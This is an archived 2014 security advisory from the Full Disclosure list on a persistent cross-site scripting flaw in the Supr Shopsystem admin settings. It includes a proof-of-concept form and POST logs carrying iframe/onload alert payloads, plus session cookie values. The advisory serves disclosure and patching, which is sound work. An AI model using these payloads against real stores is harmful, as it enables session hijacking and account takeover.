[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] Supr Shopsystem - Persistent UI Vulnerability
From: Vulnerability Lab <research () vulnerability-lab ! com>
Date: 2014-11-21 11:35:38
Message-ID: 546F238A.4090103 () vulnerability-lab ! com
[Download RAW message or body]
Document Title:
===============
Supr Shopsystem v5.1.0 - Persistent UI Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1353
Release Date:
=============
2014-11-07
Vulnerability Laboratory ID (VL-ID):
====================================
1353
Common Vulnerability Scoring System:
====================================
3.1
Product & Service Introduction:
===============================
SUPR is a modern and user-friendly system which allows each store very quickly and easily \
create their own online store. Without installation and own webspace you can begin to create \
products and content right after the registration. With our free designs and the great \
customization options you can customize and adapt to your ideas your shop. You have to be an \
expert to work with the SUPR Shop.
( Copy of the Vendor Homepage: http://de.supr.com/tour )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a persistent input validation \
vulnerability in the official Supr Shopsystem v5.1.0 web-application.
Vulnerability Disclosure Timeline:
==================================
2014-11-05: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Supreme NewMedia GmbH
Product: Supr - Shopsystem Web Application 5.1.0
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
An application-side input validation web vulnerability has been discovered in the official Supr \
Shopsystem v5.1.0 web-application. The vulnerability can be exploited by remote attackers to \
execute persistent codes with forced client-side browser requests through a non expired \
session or by local post inject.
The vulnerability is located in the blogname, shop slogan and tags input fields of the \
Dashboard > Settings > General > (setting_shopdetail) module. Remote attackers are able to \
prepare client-side requests with malicious context to take over administrator accounts on \
interaction (click link). Local attackers with privileged user accounts are also able to \
inject own script codes locally by manipulation of the vulnerable setting_shopdetail POST \
method request. The execution of the code occurs above to the error exception-handling that \
should prevent but got evaded.
The error class with the exception will be evaded because of the request that went through and \
executes earlier then the exception prevents the execute. Remote attackers are able to prepare \
a post request that allows to execute the code in one shot through the same origin policy. The \
request can be injected locally to reproduce or as prepare POST request that manipulates the \
values when a non expired session clicks for example a manipulated link.
The security risk of the application-side web vulnerability is estimated as medium with a cvss \
(common vulnerability scoring system) count of 3.2. Exploitation of the application-side web \
vulnerability requires a low privileged web-application user account and low user interaction. \
Successful exploitation of the vulnerabilities result in persistent phishing mails, session \
hijacking, persistent external redirect to malicious sources and application-side manipulation \
of affected or connected module context.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Dashboard > Settings > General > (setting_shopdetail)
Vulnerable Parameter(s):
[+] blogname
[+] blog/shop slogan
[+] tags
Affected Module(s):
[+] Dashboard (localhost:80/a/wp-admin/[x])
Proof of Concept (PoC):
=======================
The application-side vulnerability can be exploited by remote attackers with low privileged \
application user account and low user interaction click. For security demonstration or to \
reproduce the security vulnerability follow the provided information and steps below to \
continue.
PoC: Dashboard > Settings > General > (setting_shopdetail)
<form id="setting_shopdetail" name="setting_shopdetail" method="post" action="">
<div class="form-row field-error">
<div class="label">
<label for="setting_shopdata_blogname" \
class="mandatory">Shopname</label> </div>
<div class="field">
<input id="setting_shopdata_blogname" name="setting_shopdata[blogname]" value="" \
type="text"><[PERSISTENT INJECTED SCRIPT CODE!];)" <"=""> <!-- <pre></pre> -->
<ul class="">
<li class="error">Das Feld <strong>Shopname</strong> enthält leider ungültige \
Zeichen!</li> </ul></div>
Note: The error class with the exception will be evaded because of the request that went \
through and executes earlier then the exception prevents the execute. Remote attackers are able \
to prepare a post request that allows to execute the code in one shot through the same origin \
policy. The request can be injected locally to reproduce or as prepare POST request that \
manipulates the values when a non expired session clicks for example a manipulated link.
--- PoC Session Logs [POST] ---
Status: 200[OK]
POST https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/admin.php?route=/setting/shopdata \
Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des \
Inhalts[-1] Mime Type[text/html] Request Header:
Host[localhost:80]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/admin.php?route=/setting/shopdata]
Cookie[PHPSESSID=ugqds8368sctjctkj1ldv34pu1; PHPSESSID=ugqds8368sctjctkj1ldv34pu1; \
__utma=182188197.576119580.1414780466.1414783994.1414786850.3; __utmc=182188197; \
__utmz=182188197.1414780466.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); \
PHPSESSID=ugqds8368sctjctkj1ldv34pu1; \
wordpress_sec_7bb63ff3c3ab7632bd8ee766293ae7eb=62ee207ef606cef58c93695d44c2f01e45ff19bd%7C1415993606%7C9555fc6c5a1ac4e4c05dacbb0d9dcd47; \
wordpress_logged_in_7bb63ff3c3ab7632bd8ee766293ae7eb=62ee207ef606cef58c93695d44c2f01e45ff19bd%7C1415993606%7C9fc5b243fde7af93c9fce527e94da34f;
_ga=GA1.2.576119580.1414780466; \
_pk_id.9.44c1=298ac1e6c0a22deb.1414784009.1.1414784081.1414784009.; \
__utma=1.576119580.1414780466.1414786842.1414786842.1; __utmb=1.4.10.1414786842; __utmc=1; \
__utmz=1.1414786842.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; \
wp-settings-time-29002=1414787115; __utmb=182188197.24.10.1414786850]
Connection[keep-alive]
Cache-Control[max-age=0]
POST-Daten:
setting_shopdata%5Bblogname%5D[%22%3E%3C[PERSISTENT INJECTED SCRIPT \
CODE!]%28%22VL%22%29+%3C]
setting_shopdata%5Bblogdescription%5D[Shop+Slogan+%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C]
shopreg%5Bshoplang%5D[de_DE]
setting_shopdata%5Bshoplang%5D[de_DE]
setting_shopdata%5Bshopcategory%5D[]
setting_shopdata%5Bshopdesc%5D[%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C]
setting_shopdata%5Bshoptags%5D[%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C]
setting_shopdata%5Bemailfooter%5D[]
setting_shopdata%5Binvoicenote%5D[]
setting_shopdata%5Bshop_google_analytics_account%5D[]
setting_shopdata%5Bshop_google_webmastertools_verification_code%5D[]
setting_shopdata%5Bsubmit%5D[save]
Response Header:
Date[Fri, 31 Oct 2014 20:25:22 GMT]
Server[Apache/2.2.16 (Debian)]
X-Powered-By[PHP/5.3.3-7+squeeze22]
p3p[CP="CAO PSA OUR"]
Expires[Wed, 11 Jan 1984 05:00:00 GMT]
Cache-Control[no-cache, must-revalidate, max-age=0, no-cache]
Set-Cookie[PHPSESSID=ugqds8368sctjctkj1ldv34pu1
wp-settings-29002=deleted; expires=Thu, 31-Oct-2013 20:25:22 GMT; path=/
wp-settings-time-29002=1414787123; expires=Sat, 31-Oct-2015 20:25:23 GMT; path=/]
Pragma[no-cache]
X-Frame-Options[SAMEORIGIN]
Connection[close]
Content-Type[text/html; charset=UTF-8]
--
Status: 200[OK]
GET https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/[PERSISTENT INJECTED SCRIPT \
CODE!] Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des \
Inhalts[283] Mime Type[text/html] Request Header:
Host[localhost:80]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/admin.php?route=/setting/shopdata]
Cookie[PHPSESSID=ugqds8368sctjctkj1ldv34pu1; PHPSESSID=ugqds8368sctjctkj1ldv34pu1; \
__utma=182188197.576119580.1414780466.1414783994.1414786850.3; __utmc=182188197; \
__utmz=182188197.1414780466.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); \
PHPSESSID=ugqds8368sctjctkj1ldv34pu1; \
wordpress_sec_7bb63ff3c3ab7632bd8ee766293ae7eb=62ee207ef606cef58c93695d44c2f01e45ff19bd%7C1415993606%7C9555fc6c5a1ac4e4c05dacbb0d9dcd47; \
wordpress_logged_in_7bb63ff3c3ab7632bd8ee766293ae7eb=62ee207ef606cef58c93695d44c2f01e45ff19bd%7C1415993606%7C9fc5b243fde7af93c9fce527e94da34f;
_ga=GA1.2.576119580.1414780466; \
_pk_id.9.44c1=298ac1e6c0a22deb.1414784009.1.1414784081.1414784009.; \
__utma=1.576119580.1414780466.1414786842.1414786842.1; __utmb=1.4.10.1414786842; __utmc=1; \
__utmz=1.1414786842.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; \
wp-settings-time-29002=1414787123; __utmb=182188197.24.10.1414786850] Connection[keep-alive]
Cache-Control[max-age=0]
Response Header:
Date[Fri, 31 Oct 2014 20:25:24 GMT]
Server[Apache/2.2.16 (Debian)]
Content-Length[283]
Keep-Alive[timeout=5, max=8]
Connection[Keep-Alive]
Content-Type[text/html; charset=iso-8859-1]
Reference(s):
https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/admin.php?route=/setting/shopdata
https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/admin.php
https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/[x]
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the vulnerable \
setting_shopdetail values in the input POST method request. Restrict the input fields of the \
tags, blogname and blog slogan to prevent persistent script code injection attacks. Setup the \
error exception above to the input mask and reconfigure it to capture the events correctly.
Security Risk:
==============
The security risk of the persistent input validation web vulnerability in the shopsystem is \
estimated as medium. (CVSS 3.1)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) \
[www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. \
Vulnerability Lab disclaims all warranties, either expressed or implied, including the \
warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its \
suppliers are not liable in any case of damage, including direct, indirect, incidental, \
consequential loss of business profits or special damages, even if Vulnerability-Lab or its \
suppliers have been advised of the possibility of such damages. Some states do not allow the \
exclusion or limitation of liability for consequential or incidental damages so the foregoing \
limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, \
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - \
admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - \
evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - \
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - \
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - \
vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires \
authorization from Vulnerability Laboratory. Permission to electronically redistribute this \
alert in its unmodified form is granted. All other rights, including the use of other media, \
are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, \
advisories, source code, videos and other information on this website is trademark of \
vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use \
or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) \
to get a permission.
Copyright © 2014 | Vulnerability Laboratory - [Evolution Security GmbH]â„¢
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
COMPANY: Evolution Security GmbH
BUSINESS: www.evolution-sec.com
_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic